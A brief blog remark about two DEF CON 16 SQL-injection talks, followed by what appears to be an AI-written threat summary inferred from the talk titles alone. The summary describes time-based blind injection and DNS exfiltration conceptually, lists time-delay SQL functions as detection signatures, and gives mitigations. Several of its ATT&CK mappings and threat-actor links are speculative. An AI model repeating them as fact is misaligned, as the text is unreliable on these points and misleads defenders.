Full Report
Some of the DC16 speaker summaries have been posted, and these 2 caught my eye: Time-Based Blind SQL Injection using heavy queries and New Tool for SQL Injection with DNS Exfiltration Both descriptions seem pretty much spot on with what we did in our DefCon talk last year.. hmm.. wonder if its new twists on it, or a little more of the same? /mh
Analysis Summary
Based on the provided context, the article only mentions two specific attack topics presented at DC16, without providing enough technical detail to fill out a full TTP summary. The analyst must infer and structure the summary based on the names of the techniques mentioned in the article. No specific malware, hashes, or confirmed threat actors are present.
Here is the structured summary focusing on the two techniques identified in the context:
---
# Tool/Technique: Time-Based Blind SQL Injection using heavy queries
## Overview
A specific variant of Time-Based Blind SQL Injection that leverages intentionally resource-intensive database queries to infer information based on the time taken for responses. This technique exploits the blind nature of the injection where direct data output is unavailable.
## Technical Details
- Type: Technique
- Platform: Web Applications (Databases running common SQL servers)
- Capabilities: Data exfiltration, database enumeration, authentication bypass via exploiting time delays correlated with the success/failure of injection payloads.
- First Seen: The context implies related work was presented the previous year (DC15), suggesting this specific variant was gaining prominence around 2008.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (Specifically for web applications)
- TA0006 - Credential Access
- T1003 - OS Credential Dumping (If database credentials are later exfiltrated)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Information exfiltrated via blind responses)
## Functionality
### Core Capabilities
- Inserting time-delay payloads (e.g., using `WAITFOR DELAY` or `BENCHMARK()`) into SQL queries.
- Using boolean logic within the query structure to control which payload executes, thus determining the response time (true condition = delay, false condition = immediate response).
- Employing "heavy queries" to maximize the time difference between true and false outcomes, making detection of the timing leak more robust against network latency.
### Advanced Features
- Applying heavy operations (e.g., complex joins, extensive table/data scanning, or cryptographic calculations) within the time-delay function to create distinguishable, large time gaps.
## Indicators of Compromise
- File Hashes: N/A (Technique, not specific malware)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Unusually high server CPU/IO spikes correlated with specific HTTP requests to the vulnerable application endpoint.
- Behavioral Indicators: Server response times showing dramatic variance corresponding to expected payload outcomes.
## Associated Threat Actors
- Not specified in the context, but commonly associated with sophisticated web application attackers, APTs, and penetration testers.
## Detection Methods
- Signature-based detection: Monitoring for known time-delay functions (`sleep()`, `pg_sleep()`, `WAITFOR DELAY`, `benchmark()`) within URL parameters or POST bodies.
- Behavioral detection: Monitoring for spikes in database load or CPU utilization that correlate directly with specific application requests.
- YARA rules if available: N/A (Requires specific implementation code)
## Mitigation Strategies
- Prevention measures: Implement Prepared Statements/Parameterized Queries to separate code from data input entirely.
- Hardening recommendations: Use least privilege for database accounts; configure WAFs to inspect and block common SQL injection patterns, including time-based stress testing signatures.
## Related Tools/Techniques
- Classic Blind SQL Injection
- Error-based SQL Injection
***
# Tool/Technique: New Tool for SQL Injection with DNS Exfiltration
## Overview
A specialized tool or framework designed to exploit SQL injection vulnerabilities not just for data extraction, but specifically for exfiltrating sensitive data by encoding it within DNS requests.
## Technical Details
- Type: Tool (Implied, as it's described as a "New Tool")
- Platform: Web Applications / Databases (The tool needs connectivity to an external DNS server)
- Capabilities: Database data extraction, encoding data into valid DNS query subdomains, and tunneling data over the DNS protocol.
- First Seen: Mentioned in the context of DC16 (2008), indicating a novel exploitation method at that time.
## MITRE ATT&CK Mapping
- TA0010 - Exfiltration
- T1048 - Exfiltration Over Alternative Protocol (Specifically DNS)
- T1059 (004) - Command and Scripting Interpreter: Unix Shell (Implied execution environment)
## Functionality
### Core Capabilities
- Using SQL injection (potentially boolean or time-based if the underlying vulnerability requires it) to retrieve data.
- Encoding retrieved rows/fields into ASCII or hexadecimal format.
- Constructing fully qualified domain names (FQDNs) where the encoded data forms the subdomain (e.g., `encodeddata[.]vulnerablehost[.]com`).
- Sending these crafted DNS queries (A, TXT, or NULL record requests) to an attacker-controlled DNS server.
### Advanced Features
- Potential automation of the assembly and disassembly (encoding/decoding) process, turning a multi-step injection process into a single, reusable tool function.
- Using common DNS protocols which are often less scrutinized by network monitoring tools than HTTP C2 channels.
## Indicators of Compromise
- File Hashes: N/A (Tool description only)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: High volume of DNS requests originating from the web server pointing to specific, unusual external DNS resolvers (attacker-controlled infrastructure).
- Behavioral Indicators: Database interaction followed immediately by large bursts of outbound DNS queries destined for a single external domain outside of typical application telemetry.
## Associated Threat Actors
- Not specified in the context. DNS exfiltration methods are common among advanced persistent threats (APTs) for covert data movement.
## Detection Methods
- Signature-based detection: Identifying unusual characters or excessive length within DNS query fields originating from application servers.
- Behavioral detection: Monitoring for abnormal DNS query volume or destination IPs originating from the web application tier—a common indicator of data staging or covert exfiltration.
- YARA rules if available: N/A
## Mitigation Strategies
- Prevention measures: Restrict outbound network access from application servers, especially limiting DNS resolution capability to only authorized, internal resolvers.
- Hardening recommendations: Implement DNS sinkholing for known malicious domains; use DNS protocol inspection tools to flag abnormally long subdomains or suspicious query types.
## Related Tools/Techniques
- SQL injection leading to command execution (if the tool leverages OS interaction).
- Data exfiltration via ICMP or custom protocols.